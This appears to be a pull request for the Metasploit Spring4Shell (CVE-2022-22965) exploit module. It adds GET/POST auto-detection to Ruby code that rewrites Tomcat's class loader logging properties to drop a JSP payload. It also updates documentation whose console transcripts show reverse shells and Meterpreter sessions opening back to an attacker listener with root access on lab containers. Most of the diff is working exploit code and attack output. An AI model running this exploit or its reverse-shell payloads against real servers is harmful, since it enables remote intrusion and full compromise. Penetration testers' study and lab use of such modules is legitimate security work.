### PR TITLE
Pr/collab/16423

### DIFF
--- a/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+++ b/documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
@@ -21,42 +21,44 @@ gain remote code execution.
 6. Run the exploit
 
 ## Options
-```
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show targets
+### HTTP_METHOD
+HTTP method to use for checking and exploitation. If set to `Automatic` (the default value), the method will be
+automatically identified. Automatically identifying the HTTP method uses the check method.
 
-Exploit targets:
+### PAYLOAD_PATH
+Path to write the payload. This is relative to the tomcat installation directory.
 
-   Id  Name
-   --  ----
-   0   Java
-   1   Linux
-   2   Windows
-```
 ## Scenarios
-Spring Framework v5.3.15 on Linux (debian docker image)
-### Target Java
+
+### Target Java (vulhub container)
+
+The target is the [vulhub container](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965) which uses the
+GET HTTP method.
 
 ```
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
+msf6 > use exploit/multi/http/spring_framework_rce_spring4shell 
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options 
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name          Current Setting       Required  Description
-   ----          ---------------       --------  -----------
-   PAYLOAD_PATH  webapps/ROOT          yes       Path to write the payload
-   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS        127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT         8085                  yes       The target port (TCP)
-   SSL           false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /helloworld/greeting  yes       The path to the application action
-   VHOST                               no        HTTP server virtual host
+   Name          Current Setting                 Required  Description
+   ----          ---------------                 --------  -----------
+   HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
+   PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
+   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         8080                            yes       The target port (TCP)
+   SSL           false                           no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
+   VHOST                                         no        HTTP server virtual host
 
 
 Payload options (generic/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -67,45 +69,60 @@ Exploit target:
    0   Java
 
 
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp 
+PAYLOAD => java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8080/
 
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Automatically identified HTTP method: GET
+[*] 192.168.159.128:8080 - Generating JSP...
+[*] 192.168.159.128:8080 - Modifying Class Loader...
+[*] 192.168.159.128:8080 - Waiting for the server to flush the logfile
+[*] 192.168.159.128:8080 - Executing JSP payload at http://192.168.159.128:8080/MUpts6425.jsp
+[+] 192.168.159.128:8080 - Log file flushed
+[*] Command shell session 1 opened (192.168.250.134:4444 -> 172.19.0.2:47418 ) at 2022-05-05 10:47:50 -0400
 
-[*] Started reverse TCP handler on 192.168.0.174:4444
-[*] 127.0.0.1:8085 - Generating JSP...
-[*] 127.0.0.1:8085 - Modifying Class Loader...
-[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
-[*] 127.0.0.1:8085 - Executing JSP payload
-[+] 127.0.0.1:8085 - Log file flushed at /webapps/ROOT/a0l048.jsp
-[!] Tried to delete a0l048.jsp, unknown result
-[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:52032 ) at 2022-04-28 00:20:00 +0200
-
-whoami
-root
+id
+uid=0(root) gid=0(root) groups=0(root)
+pwd
+/usr/local/tomcat
 ```
 
-### Target Linux (x86)
+### Target Linux (x64)
+
+The target is the [vleminator container](https://github.com/vleminator/Spring4Shell-POC) which uses the
+POST HTTP method.
+
 ```
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
+msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux 
+TARGET => Linux
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options 
 
 Module options (exploit/multi/http/spring_framework_rce_spring4shell):
 
-   Name          Current Setting       Required  Description
-   ----          ---------------       --------  -----------
-   PAYLOAD_PATH  webapps/ROOT          yes       Path to write the payload
-   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS        127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT         8085                  yes       The target port (TCP)
-   SSL           false                 no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /helloworld/greeting  yes       The path to the application action
-   VHOST                               no        HTTP server virtual host
+   Name          Current Setting                 Required  Description
+   ----          ---------------                 --------  -----------
+   HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
+   PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
+   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         8080                            yes       The target port (TCP)
+   SSL           false                           no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
+   VHOST                                         no        HTTP server virtual host
 
 
-Payload options (linux/x86/shell_reverse_tcp):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   CMD    /bin/sh          yes       The command string to execute
-   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -116,18 +133,30 @@ Exploit target:
    1   Linux
 
 
-msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit
+msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8085/helloworld/greeting
 
-[*] Started reverse TCP handler on 192.168.0.174:4444
-[*] 127.0.0.1:8085 - Generating JSP...
-[*] 127.0.0.1:8085 - Modifying Class Loader...
-[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
-[*] 127.0.0.1:8085 - Executing JSP payload
-[+] 127.0.0.1:8085 - Log file flushed at /webapps/ROOT/hejXj1.jsp
-[+] Deleted /tmp/YAlc3bD
-[!] Tried to delete hejXj1.jsp, unknown result
-[*] Command shell session 3 opened (192.168.0.174:4444 -> 192.168.0.174:52077 ) at 2022-04-28 00:21:32 +0200
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Automatically identified HTTP method: POST
+[*] 192.168.159.128:8085 - Generating JSP...
+[*] 192.168.159.128:8085 - Modifying Class Loader...
+[*] 192.168.159.128:8085 - Waiting for the server to flush the logfile
+[*] 192.168.159.128:8085 - Executing JSP payload at http://192.168.159.128:8085/S0J17.jsp
+[+] 192.168.159.128:8085 - Log file flushed
+[*] Sending stage (3020772 bytes) to 172.17.0.2
+[+] Deleted /tmp/6DKA
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:54902 ) at 2022-05-05 10:52:35 -0400
 
-whoami
-root
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/helloworld
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.2 (Linux 5.17.4-100.fc34.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
 ```

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ManualRanking # It's going to manipulate the Class Loader
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
   include Msf::Exploit::EXE
@@ -78,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
-        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT'])
+        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
+        OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),
       ]
     )
     register_advanced_options [
@@ -106,18 +108,18 @@ class MetasploitModule < Msf::Exploit::Remote
     dropper
   end
 
-  def modify_class_loader(opts)
+  def modify_class_loader(method, opts)
     cl_prefix = 'class.module.classLoader'
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s),
       'version' => '1.1',
-      'method' => 'POST',
+      'method' => method,
       'headers' => {
         'c1' => '<%', # %{c1}i replacement in payload
         'c2' => '%>' # %{c2}i replacement in payload
       },
-      'vars_post' => {
+      "vars_#{method == 'GET' ? 'get' : 'post'}" => {
         "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],
         "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
         "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
@@ -193,6 +195,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    @checkcode = _check
+  end
+
+  def _check
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
@@ -213,27 +219,49 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Detected #{server} #{version} running")
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI']),
-      'data' => "class.module.classLoader.DefaultAssertionStatus=#{Rex::Text.rand_text_alpha_lower(4..6)}"
-    )
+    if datastore['HTTP_METHOD'] == 'Automatic'
+      # prefer POST over get to keep the vars out of the query string if possible
+      methods = %w[POST GET]
+    else
+      methods = [ datastore['HTTP_METHOD'] ]
+    end
 
-    # setting the default assertion status to a valid status
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI']),
-      'data' => 'class.module.classLoader.DefaultAssertionStatus=true'
-    )
-    return CheckCode::Safe unless res.code == 400
+    methods.each do |method|
+      vars = "vars_#{method == 'GET' ? 'get' : 'post'}"
+      res = send_request_cgi(
+        'method' => method,
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }
+      )
 
-    Exploit::CheckCode::Appears
+      # setting the default assertion status to a valid status
+      send_request_cgi(
+        'method' => method,
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }
+      )
+      return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400
+    end
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
     prefix_jsp = rand_text_alphanumeric(rand(3..5))
     date_format = rand_text_numeric(rand(1..4))
     @jsp_file = prefix_jsp + date_format + '.jsp'
+    http_method = datastore['HTTP_METHOD']
+    if http_method == 'Automatic'
+      # if the check was skipped but we need to automatically identify the method, we have to run it here
+      @checkcode = check if @checkcode.nil?
+      http_method = @checkcode.details[:method]
+      fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?
+
+      print_good("Automatically identified HTTP method: #{http_method}")
+    end
+
+    # if the check method ran automatically, add a short delay before continuing with exploitation
+    sleep(5) if @checkcode
 
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
@@ -251,7 +279,7 @@ class MetasploitModule < Msf::Exploit::Remote
       suffix: '.jsp',
       file_date_format: date_format
     }
-    res = modify_class_loader(properties)
+    res = modify_class_loader(http_method, properties)
     unless res
       fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
     end
@@ -265,7 +293,7 @@ class MetasploitModule < Msf::Exploit::Remote
       file_date_format: ''
     }
 
-    modify_class_loader(properties)
+    modify_class_loader(http_method, properties)
 
     check_log_file
 


### PR DESCRIPTION
This updates the module to work with both the HTTP GET and POST verbs as well as autodetect the correct one using the check method. The check method is now automatically run prior to exploitation via the `AutoCheck` mixin.

When the check method is run before exploitation, it's necessary to insert a short delay for stability. I was not able to find an easy way to have the delay be adaptive by checking the HTTP response as was possible while waiting for the log files to be flushed.
